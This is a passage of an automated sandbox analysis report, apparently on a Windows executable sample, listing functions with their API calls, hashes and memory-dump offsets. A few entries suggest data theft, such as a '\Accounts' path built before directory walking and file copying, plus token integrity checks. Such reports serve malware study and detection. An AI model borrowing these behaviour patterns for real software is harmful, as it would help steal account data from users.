CreateFileMappingA.KERNEL32 ref: 0043DC15
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,4876E7FF,?,?,00004098,73B76490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC32
CloseHandle.KERNEL32(?,?,?,00004098,73B76490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC42

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleMappingView
String ID:
API String ID: 1187395538-0
Opcode ID: e48d622de60c70f1e6bb29bf885ae58b6a6e0b3b64331a7a970e46566c513ccf
Instruction ID: 550ff010cc939da366848678e5ec9f0b7c02c89e159099b7b19e896844ef7b36
Opcode Fuzzy Hash: e48d622de60c70f1e6bb29bf885ae58b6a6e0b3b64331a7a970e46566c513ccf
Instruction Fuzzy Hash: D7115670D10B009EDB328B17AC44B13BAE9EB9A761F10652FE59581640D6F49844DF6D

Uniqueness

Uniqueness Score: -1.00%

Function 00459D09, Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00421A56,00000000,00000002,00421A56,00000000,?,?,?,00459DB6,00000000,00000000,00421A56,00000002), ref: 00459D42
GetLastError.KERNEL32(?,00459DB6,00000000,00000000,00421A56,00000002,?,004464A1,?,00000000,00000000,00000001,00421A56,?,?,00446557), ref: 00459D4C
__dosmaperr.LIBCMT ref: 00459D53

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 27104622859b43d5d0758ad57ef1ede1b45be39dee652525f4e95165173d909b
Instruction ID: a1e4ff7bec2cfff123a609e7ffbf930a0197e3222467c7c804d78764c443cfe2
Opcode Fuzzy Hash: 27104622859b43d5d0758ad57ef1ede1b45be39dee652525f4e95165173d909b
Instruction Fuzzy Hash: 45014C33B00115EFCF159F59DC0586E3B39DF85321B24020AF8119B291FB75DD0587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042B31D, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042B322

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 0042BC7F: __EH_prolog.LIBCMT ref: 0042BC84

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

"\, xrefs: 0042B528

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate
String ID: "\
API String ID: 2428181759-2226538752
Opcode ID: f161e7e958c05c3a5f8518edccb059cfd84f813dcbc13b5e5687a33423425f0a
Instruction ID: 74c8e02cedf363cec93cb5a21cd2564252097201552f7d0fce9620bf0d274a46
Opcode Fuzzy Hash: f161e7e958c05c3a5f8518edccb059cfd84f813dcbc13b5e5687a33423425f0a
Instruction Fuzzy Hash: 3FC1E130E04258CBDF15EFA5C9906EDBB71EF55308F5480AED0497B242DF381A89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2D4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A2D9

Part of subcall function 004091F2: __EH_prolog.LIBCMT ref: 004091F7
Part of subcall function 004091F2: std::exception::exception.LIBCONCRT ref: 00409298

Strings

Unknown exception, xrefs: 0040A348

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$std::exception::exception
String ID: Unknown exception
API String ID: 1037574509-410509341
Opcode ID: 110c0cf9c9989f7fa33b286c836881199d8f00c6baa4c1a89d63c38074886dec
Instruction ID: d1b7aa20dfa380f05ae0c9d45f11c5fbc92261fe5dbcb6166fee3a439ce0bcbc
Opcode Fuzzy Hash: 110c0cf9c9989f7fa33b286c836881199d8f00c6baa4c1a89d63c38074886dec
Instruction Fuzzy Hash: 1B21A972D00305AFCB159FA9D4405EAFBB1FF08308F10C56EE81AAB241D3759A01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041C6D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 0041C740

Strings

unexpected , xrefs: 0041C6E1

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID: unexpected
API String ID: 1075933841-3101738596
Opcode ID: 18397ac2b9d8e26e82412d1cfc51c9ad6e53872204ff7e61e60b2ca157498116
Instruction ID: a66781187814ca93c1fbc5b8ac049a75d27c58944f69824250d0d7268acf1f2c
Opcode Fuzzy Hash: 18397ac2b9d8e26e82412d1cfc51c9ad6e53872204ff7e61e60b2ca157498116
Instruction Fuzzy Hash: 46119172500215AF8B04DF9ADC858DB7BAEEE49364710456FF418DB241D775E9408BE8

Uniqueness

Uniqueness Score: -1.00%

Function 004137E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004137E9

Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1

Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2

Strings

NA, xrefs: 0041383D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: NA
API String ID: 3519838083-2562218444
Opcode ID: 181df0eba96cc29876ef3396f1a6a40a793ba8a1f07bf979f73459ae1dee672a
Instruction ID: da25af750edcbdee1afc70327f05f7be60494842f1cb4fd143c88d520103cf3c
Opcode Fuzzy Hash: 181df0eba96cc29876ef3396f1a6a40a793ba8a1f07bf979f73459ae1dee672a
Instruction Fuzzy Hash: D1119171A05215AFDF15EFA9C8857DEBBB0AF08304F0080AFE509A7391C7749E04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00412B79, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412B7E

Part of subcall function 00413383: __EH_prolog.LIBCMT ref: 00413388

Strings

pOA, xrefs: 00412B9B

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: pOA
API String ID: 3519838083-3716846478
Opcode ID: dc5d0c48c73b47206b199b72f269ad7969b1bdc6c4a85331370fab92cf4e90e7
Instruction ID: 5e5ced76d1c4fd54a0b734acc99afaa11967ed71290437ac02fced9b03c88cc4
Opcode Fuzzy Hash: dc5d0c48c73b47206b199b72f269ad7969b1bdc6c4a85331370fab92cf4e90e7
Instruction Fuzzy Hash: 2BF0C9B86106559FC725CF18C449D5ABBF4FB08318700865EE49A87711D7B5ED05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004091F2, Relevance: 3.1, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004091F7
std::exception::exception.LIBCONCRT ref: 00409298

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologstd::exception::exception
String ID:
API String ID: 2619619420-0
Opcode ID: f609cfb5bc4f61f6821307a2f6bf41c080323cdc5d5257e562f737a67b82de2d
Instruction ID: 4ca3936c078d54e57671f6f98a26ddc2dbffc98c2064a6f7f6a0a40424ae653c
Opcode Fuzzy Hash: f609cfb5bc4f61f6821307a2f6bf41c080323cdc5d5257e562f737a67b82de2d
Instruction Fuzzy Hash: 9E31F571D00208DFCB15EFA9C885ADEBBF4FF18314F14842EE415A7281E7789A85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004133DB, Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004133E0
std::locale::_Init.LIBCPMT ref: 00413428

Part of subcall function 0043F7E5: std::_Lockit::_Lockit.LIBCPMT ref: 0043F7F7
Part of subcall function 0043F7E5: std::locale::_Setgloballocale.LIBCPMT ref: 0043F812
Part of subcall function 0043F7E5: _Yarn.LIBCPMT ref: 0043F828
Part of subcall function 0043F7E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0043F868

Part of subcall function 00413514: __EH_prolog.LIBCMT ref: 00413519

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 2277578679-0
Opcode ID: 2aee651974f205d737d6ac32d54ef4e0e4ed2081dbd54015839d45e7ad123df5
Instruction ID: 2797602d6ede606213e337ce2324edd57e786c084a3637d07d4407523244eb77
Opcode Fuzzy Hash: 2aee651974f205d737d6ac32d54ef4e0e4ed2081dbd54015839d45e7ad123df5
Instruction Fuzzy Hash: 78113AB1A00B06BBD344DF2AC5C1655FBB4FF48328B50862FE40997A81D774A960CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCB2, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
_strlen.LIBCMT ref: 0041FCD8

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory_strlen
String ID:
API String ID: 942933051-0
Opcode ID: 733dbe867288d5ca66b91b49cc6e58ce280549d4c6316cb80bb52f9bf1a0da96
Instruction ID: 4c7206307d1035eeeff1e9c0a0999dde91d7a809fbe3ac133bfd090c61ce09d6
Opcode Fuzzy Hash: 733dbe867288d5ca66b91b49cc6e58ce280549d4c6316cb80bb52f9bf1a0da96
Instruction Fuzzy Hash: 77014C726082055AE728977DB805BFB73E99B45724F20003FF857C7180EA68DCC7825C

Uniqueness

Uniqueness Score: -1.00%

Function 00435484, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00435489

Part of subcall function 00435346: lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
Part of subcall function 00435346: lstrcpyW.KERNEL32(00000000,00000000), ref: 004353C0
Part of subcall function 00435346: lstrcpyW.KERNEL32(00000000,\Accounts), ref: 004353CC

_strlen.LIBCMT ref: 0043549D

Part of subcall function 004116B4: __EH_prolog.LIBCMT ref: 004116B9

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologlstrcpy$_strlenlstrlen
String ID:
API String ID: 27009005-0
Opcode ID: cf419d6034521a529b3b937dd3b5183a6b79423b6b2fc12cd6bea7836fd04c3b
Instruction ID: 967c59de1264e5437e808e2dc9646ed90955aae641b5eab628f7aa89402fc85e
Opcode Fuzzy Hash: cf419d6034521a529b3b937dd3b5183a6b79423b6b2fc12cd6bea7836fd04c3b
Instruction Fuzzy Hash: AC112570D00556EAEB19FB75DC52EEEBB359F50308F1081AEE00663243EB384B45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0043DDD0, Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000001,80000000,00000001,00000000,00000003,00000000,00000000,02C3AF48,?,00000000,?,0043E3C4,?), ref: 0043DE13

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5958af012b2363362042ea7e508fcc9436c77a530ec058238d0ea4f7d295c598
Instruction ID: 7b0ff4dd052904a3b23983b3bd9cd87b3b88dbabaee70fd5e41bad5e6d0b566c
Opcode Fuzzy Hash: 5958af012b2363362042ea7e508fcc9436c77a530ec058238d0ea4f7d295c598
Instruction Fuzzy Hash: B401B171A00B00AFE7214E3AACC6BA7FEE8FB69758F10413FF65686250C7B49C009625

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADBE, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADCA

Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADDC

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
String ID:
API String ID: 478157137-0
Opcode ID: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
Instruction ID: a824447d2fdea08db754f01d1575c5cda49c6909b15693c7d8439b486d980dbb
Opcode Fuzzy Hash: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
Instruction Fuzzy Hash: DBE0803110424577DF015A13DD0196B7717FF91355B10103BFD0456991D775DC7165D9

Uniqueness

Uniqueness Score: -1.00%

Function 0043EC21, Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,00000000,?,?,?,0043EF0B,?,0040B6A1,00000000,?,?,?,?,0040B6A1,?), ref: 0043EC31
GetLastError.KERNEL32(?,0043EF0B,?,0040B6A1,00000000,?), ref: 0043EC47

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CopyErrorFileLast
String ID:
API String ID: 374144340-0
Opcode ID: 58b0a90eb6ed054f5c13d71288aa4f4864bf2095164f77525f082a59b8b3d4fb
Instruction ID: c3eae09050113aaa56b93bb7bcaafac247cb116d4b7d05269366418418acabbb
Opcode Fuzzy Hash: 58b0a90eb6ed054f5c13d71288aa4f4864bf2095164f77525f082a59b8b3d4fb
Instruction Fuzzy Hash: 7DE02630A08188BFDB018B66DC08F6E3FE9AF18304F18C054F40485251DAB4D501DB25

Uniqueness

Uniqueness Score: -1.00%

Function 0042B76D, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042B772

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID:
API String ID: 3708980276-0
Opcode ID: 656ea436ca45c7e7c0c3a0e13d8228b99bdcea6a964389d16aecc10b0b21a028
Instruction ID: 961e30c5faa2a638eb1dabf367997125721a18bc80a6a3d51cdc21dae2d9d728
Opcode Fuzzy Hash: 656ea436ca45c7e7c0c3a0e13d8228b99bdcea6a964389d16aecc10b0b21a028
Instruction Fuzzy Hash: BA819C70D012AC9ADB01DFE9DA811ECFBB0FF6A308F50925EE84477252DB740A89CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00411230, Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00411235

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a5b944ba661520ff1384948320fddcd62c7b4f0f6bcb1ee2f4d6b7b57e768216
Instruction ID: dc4a73e1b3eed8f5466efea9ab6fbc2949c634d1f19277dd442a4c8a1a499091
Opcode Fuzzy Hash: a5b944ba661520ff1384948320fddcd62c7b4f0f6bcb1ee2f4d6b7b57e768216
Instruction Fuzzy Hash: 6E515831D00219DFDF14DFA9D4908EEBBB5EF48320F60026FE522A3695D739A985CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00413B98, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413B9D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d969057b2c9edf4b20e3a5efd7ebe5ea69cb5f15263f61e9dfcb87d24167adf6
Instruction ID: 1590526c6e7a1ea769188aa884af5b1b43062d79938ce3292021d864919962f1
Opcode Fuzzy Hash: d969057b2c9edf4b20e3a5efd7ebe5ea69cb5f15263f61e9dfcb87d24167adf6
Instruction Fuzzy Hash: A851B135A045059FCB24CFACC5C08EDBBB1BF48715B24425AE525AB392E734EE81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00411A2D, Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40225e920afc0db703b05c6661e4926d11d6283113a1e6301609063d68405b9
Instruction ID: 9296e774f7676c17423c1ca821238ec4e049e1c4d15cb0688202de38e1809e13
Opcode Fuzzy Hash: a40225e920afc0db703b05c6661e4926d11d6283113a1e6301609063d68405b9
Instruction Fuzzy Hash: 5A410774A04705DFC715CF68C18099ABBF1FF4A314B108AAAD95A8B7A0E734F980CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1D7, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F207

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e3175f79339e4997ac26686c8279300ca21be3ca15003d7aa02cc50c41f7abd4
Instruction ID: 7a39a49cf585f4d0e46ac43e0a9d888c8851a94b0eff99b2d07aad98a01891d0
Opcode Fuzzy Hash: e3175f79339e4997ac26686c8279300ca21be3ca15003d7aa02cc50c41f7abd4
Instruction Fuzzy Hash: 0B310679F04205ABDF14CAA5C8406EEBBA5AB41320F2441BFE501E73C1DA799DCA8748

Uniqueness

Uniqueness Score: -1.00%

Function 0043614D, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00436152

Part of subcall function 00413383: __EH_prolog.LIBCMT ref: 00413388

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 059ca1873fcc2719343bcb834764f13c4c9169dddaad165c4e9b81eb8f9653c6
Instruction ID: fe10076f0eb781e04d3e5f2d024a678e22d48b2bbc721e39841d5c83f663e4db
Opcode Fuzzy Hash: 059ca1873fcc2719343bcb834764f13c4c9169dddaad165c4e9b81eb8f9653c6
Instruction Fuzzy Hash: 6D3138B1901218DFEB14DF65DC95FEDB3B4AB44304F1081AFE809A7281D7745E44CE64

Uniqueness

Uniqueness Score: -1.00%

Function 004392B7, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004392BC

Part of subcall function 004147AA: __EH_prolog.LIBCMT ref: 004147AF

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ea0b6e27bd021820b62f47da8042964ebdbd49466a4f660c9dccf5ea70a4d932
Instruction ID: 6be09e817262d6fd016b7c756547bfcd74f1d2dd2460e91cb2eed3baf958d87c
Opcode Fuzzy Hash: ea0b6e27bd021820b62f47da8042964ebdbd49466a4f660c9dccf5ea70a4d932
Instruction Fuzzy Hash: 78317EB1E082449FCB14DFA9C490AADBBB0AF4C324F24515FE416973C1DBB88E45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004235F2, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004235F7

Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92

Part of subcall function 004206DD: __EH_prolog.LIBCMT ref: 004206E2

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$GlobalH_prologInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID:
API String ID: 2888657697-0
Opcode ID: 9e2e020d0e772ffbecbe2351f0a6f25ea5963317bc3f9a4d56e27b3aa8109c9c
Instruction ID: cd57585f92f4651694f3437ef3a0fe2b6c7561e3377806dc9b6083a3b3dba577
Opcode Fuzzy Hash: 9e2e020d0e772ffbecbe2351f0a6f25ea5963317bc3f9a4d56e27b3aa8109c9c
Instruction Fuzzy Hash: 6B3189B1D04269EFCF04EFA6D591AEDFB70BF58308F60445EE40167242DB786A48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413886, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041388B

Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1

Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b9e46aa26a23737d396955e57df94d5364da21e13b356acaf24135aeaf177474
Instruction ID: e0e9e3466cc930e456ed994cce60529752f33af2ff264595590bafee3097d804
Opcode Fuzzy Hash: b9e46aa26a23737d396955e57df94d5364da21e13b356acaf24135aeaf177474
Instruction Fuzzy Hash: 70219DB1A013149FDB65DF69C88479ABBF0AF08304F0084AED50AA7792D775AE04CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0043E0F8, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000,02C3AF48,?,02C3AF48,?,0043E75E,02C3AFDC,00004000), ref: 0043E163

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e8f0321b907f8c93eff9f9fe80aa9f9a4d2c7ab348c1fb85dc6ceb18b6bb5835
Instruction ID: b8c3acaed76ea71400faf53aace5318325b6ba4514e0b8ac76d2e751ebdd2552
Opcode Fuzzy Hash: e8f0321b907f8c93eff9f9fe80aa9f9a4d2c7ab348c1fb85dc6ceb18b6bb5835
Instruction Fuzzy Hash: 9B119A31601515FBDB05DF26C804A9ABBB9FF08764F10811AF86897250DB30FE61DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 00414D6C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 004090F5

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: d2e8f843bd8a4b25c813b3877dcae178226274afcf11ee46ceea94b2d4bbbaa1
Instruction ID: 251cd1cbde13bf4c341522c7ccce1db13cd85876ec4737e2f77db5c4961eba8a
Opcode Fuzzy Hash: d2e8f843bd8a4b25c813b3877dcae178226274afcf11ee46ceea94b2d4bbbaa1
Instruction Fuzzy Hash: 53F0447250020C67CB24BBA6D802C9FBB9C9E00368B50043FF90897242EB39DE0483DE

Uniqueness

Uniqueness Score: -1.00%

Function 0045A8FE, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0045A938

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 612a1abec5923c488ebb59fc330e05bb17ffe2dc4446500d9ec8559e1d33c293
Instruction ID: f3ba4f7996b305dadc24657f6488ca3712718daac0c1ff3c745a6b17617cb164
Opcode Fuzzy Hash: 612a1abec5923c488ebb59fc330e05bb17ffe2dc4446500d9ec8559e1d33c293
Instruction Fuzzy Hash: 8E1148B1A0420AAFCF05DF58E94198F7BF4EF48304F05406AF805EB352D634DA25CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043E9C5, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043E9CA

Part of subcall function 0043DBE2: CreateFileMappingA.KERNEL32 ref: 0043DC15

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFileH_prologMapping
String ID:
API String ID: 3367180550-0
Opcode ID: d64d4aa17e2adaf32635f94d8ef839382d33390163fd8f28caf12e903a2f28a7
Instruction ID: cc7c395e0eb8e052096abd9c2256c719d51126836da7d164bd1a85b90316bbdc
Opcode Fuzzy Hash: d64d4aa17e2adaf32635f94d8ef839382d33390163fd8f28caf12e903a2f28a7
Instruction Fuzzy Hash: 011170B0911B119FC3A0DF3AD80161ABAF4FF48710B10892FE19AD3B81E778A500CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFFF, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 8e2b376a1d5bd31ae04d1a7a932967fba1ec4f5808461264f66b7bb6ef01c9f2
Instruction ID: 941fd2b4e4699c03d34950e30c923efa3b28c70746c31d4bc35f3efe690fa374
Opcode Fuzzy Hash: 8e2b376a1d5bd31ae04d1a7a932967fba1ec4f5808461264f66b7bb6ef01c9f2
Instruction Fuzzy Hash: 4A01A7B0A04204AFDB348E14CC40BF23F99EB59358F34847BE005CD243D26ADDCB9A59

Uniqueness

Uniqueness Score: -1.00%

Function 0041431D, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00414374

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 45785de05d0fb76ceb9285504114cf131db981ab5624751453ce5ce767ad5bca
Instruction ID: 53af2e0a4a2d5bbafcd996743a5083da4ffb5b29c1bc799091ee148351c004be
Opcode Fuzzy Hash: 45785de05d0fb76ceb9285504114cf131db981ab5624751453ce5ce767ad5bca
Instruction Fuzzy Hash: 2C01F2B2200205BFE7149F5AD88199EBBFCFB89354B20011FF919C7241DB74AD9087B8

Uniqueness

Uniqueness Score: -1.00%

Function 0041F06A, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(000000FF,00000244,00000000,00000000,00000000,?,0000FFFF,00000244,?,0041F292,00000001,00000000,?,00000000,00000244), ref: 0041F090

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
